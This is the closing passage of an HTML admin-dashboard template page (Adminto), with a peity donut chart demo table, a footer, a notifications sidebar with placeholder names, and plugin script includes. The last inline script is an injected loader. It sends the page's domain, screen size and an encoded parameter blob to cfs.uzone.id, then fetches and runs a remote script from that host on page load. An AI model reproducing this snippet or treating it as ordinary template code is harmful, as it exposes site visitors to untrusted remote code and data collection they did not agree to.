                                            "#ebeff2"], "innerRadius": 18, "radius": 28 }'"&gt;4/7&lt;/span&gt;
                                        </code>
                                    </td>
                                </tr>

                                <tr>
                                    <td>
                                        <span data-plugin="peity-donut-alt"
                                              data-peity='{ "fill": ["#5d9cec", "#ebeff2"],   "innerRadius": 20, "radius": 24 }'>5/7</span>
                                    </td>
                                    <td>
                                        <code>
                                            &lt;span data-plugin="peity-donut-alt" data-peity='{ "fill": ["#5d9cec",
                                            "#ebeff2"], "innerRadius": 20, "radius": 24 }'"&gt;5/7&lt;/span&gt;
                                        </code>
                                    </td>
                                </tr>
                                <tr>
                                    <td>
                                        <span data-plugin="peity-donut-alt"
                                              data-peity='{ "fill": ["#fb6d9d", "#ebeff2"], "innerRadius": 18, "radius": 20 }'>6/7</span>
                                    </td>
                                    <td>
                                        <code>
                                            &lt;span data-plugin="peity-donut-alt" data-peity='{ "fill": ["#fb6d9d",
                                            "#ebeff2"], "innerRadius": 18, "radius": 20 }'"&gt;6/7&lt;/span&gt;
                                        </code>
                                    </td>
                                </tr>

                                </tbody>
                            </table>
                        </div>
                    </div><!-- end col-->
                </div>
                <!-- end row -->


                <!-- Footer -->
                <footer class="footer text-right">
                    <div class="container">
                        <div class="row">
                            <div class="col-xs-6">
                                2016 © Adminto.
                            </div>
                            <div class="col-xs-6">
                                <ul class="pull-right list-inline m-b-0">
                                    <li>
                                        <a href="#">About</a>
                                    </li>
                                    <li>
                                        <a href="#">Help</a>
                                    </li>
                                    <li>
                                        <a href="#">Contact</a>
                                    </li>
                                </ul>
                            </div>
                        </div>
                    </div>
                </footer>
                <!-- End Footer -->

            </div>
            <!-- end container -->



            <!-- Right Sidebar -->
            <div class="side-bar right-bar">
                <a href="javascript:void(0);" class="right-bar-toggle">
                    <i class="zmdi zmdi-close-circle-o"></i>
                </a>
                <h4 class="">Notifications</h4>
                <div class="notification-list nicescroll">
                    <ul class="list-group list-no-border user-list">
                        <li class="list-group-item">
                            <a href="#" class="user-list-item">
                                <div class="avatar">
                                    <img src="assets/images/users/avatar-2.jpg" alt="">
                                </div>
                                <div class="user-desc">
                                    <span class="name">Michael Zenaty</span>
                                    <span class="desc">There are new settings available</span>
                                    <span class="time">2 hours ago</span>
                                </div>
                            </a>
                        </li>
                        <li class="list-group-item">
                            <a href="#" class="user-list-item">
                                <div class="icon bg-info">
                                    <i class="zmdi zmdi-account"></i>
                                </div>
                                <div class="user-desc">
                                    <span class="name">New Signup</span>
                                    <span class="desc">There are new settings available</span>
                                    <span class="time">5 hours ago</span>
                                </div>
                            </a>
                        </li>
                        <li class="list-group-item">
                            <a href="#" class="user-list-item">
                                <div class="icon bg-pink">
                                    <i class="zmdi zmdi-comment"></i>
                                </div>
                                <div class="user-desc">
                                    <span class="name">New Message received</span>
                                    <span class="desc">There are new settings available</span>
                                    <span class="time">1 day ago</span>
                                </div>
                            </a>
                        </li>
                        <li class="list-group-item active">
                            <a href="#" class="user-list-item">
                                <div class="avatar">
                                    <img src="assets/images/users/avatar-3.jpg" alt="">
                                </div>
                                <div class="user-desc">
                                    <span class="name">James Anderson</span>
                                    <span class="desc">There are new settings available</span>
                                    <span class="time">2 days ago</span>
                                </div>
                            </a>
                        </li>
                        <li class="list-group-item active">
                            <a href="#" class="user-list-item">
                                <div class="icon bg-warning">
                                    <i class="zmdi zmdi-settings"></i>
                                </div>
                                <div class="user-desc">
                                    <span class="name">Settings</span>
                                    <span class="desc">There are new settings available</span>
                                    <span class="time">1 day ago</span>
                                </div>
                            </a>
                        </li>

                    </ul>
                </div>
            </div>
            <!-- /Right-bar -->

        </div>



        <!-- jQuery  -->
        <script src="assets/js/jquery.min.js"></script>
        <script src="assets/js/bootstrap.min.js"></script>
        <script src="assets/js/detect.js"></script>
        <script src="assets/js/fastclick.js"></script>
        <script src="assets/js/jquery.slimscroll.js"></script>
        <script src="assets/js/jquery.blockUI.js"></script>
        <script src="assets/js/waves.js"></script>
        <script src="assets/js/wow.min.js"></script>
        <script src="assets/js/jquery.nicescroll.js"></script>
        <script src="assets/js/jquery.scrollTo.min.js"></script>

        <!-- KNOB JS -->
        <!--[if IE]>
        <script type="text/javascript" src="assets/plugins/jquery-knob/excanvas.js"></script>
        <![endif]-->
        <script src="assets/plugins/jquery-knob/jquery.knob.js"></script>

        <!-- Circliful -->
        <script src="assets/plugins/jquery-circliful/js/jquery.circliful.min.js"></script>

        <!-- Sparkline charts -->
        <script src="assets/plugins/jquery-sparkline/jquery.sparkline.min.js"></script>
        <script src="assets/pages/jquery.other-charts.js"></script>

        <!-- peity charts -->
        <script src="assets/plugins/peity/jquery.peity.min.js"></script>

        <!-- App js -->
        <script src="assets/js/jquery.core.js"></script>
        <script src="assets/js/jquery.app.js"></script>

    <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.uzone.id/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnrrKOU8lJFiu9gys7UD9qIxVt9N2gh%2bQyxIQYzm1bNPK4CviYFW2va3yUjAfDfe9GPV4mK3tUEsrUY%2bKXZNeL4q%2bCfB8BUDPEgKDm2qO2viao5XCzCRtsSEPTU%2bs2hO2NT7cYACC2TCHDuZFx%2fxZremvRwgFKMteS2rLomcykyDcs%2buwpLdXGyuMP66GwV2c44N7svDdDG5Uq1uaccVmkoSVTa1jbo6PSx%2bgVGY2JoOJ2dslG%2bqGinirm0n9PGsO0liXgHhx3ZyRRDGRG48DKg2Zlx3StvPYrCJSfaKkA1whwrJsBS5AS7Q9SXvjeTVS6fFvevONNDofBRTejuGCm%2fF9XGIdcz%2fcMKjg4cwSeO9uVKj2l1CSJk8ksgJJ%2bqH1DC4%2bYpPziaHq0HqiceYh%2fx2figa9lz%2frFkmpUwQrXRTRCrppxTVmxfY3UYCIKps8Kg2QwtutjSVgOZcCjEOmVBxTaWrkQuF0c2S5lhCmh9j4BDHfXnMA0YQ%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>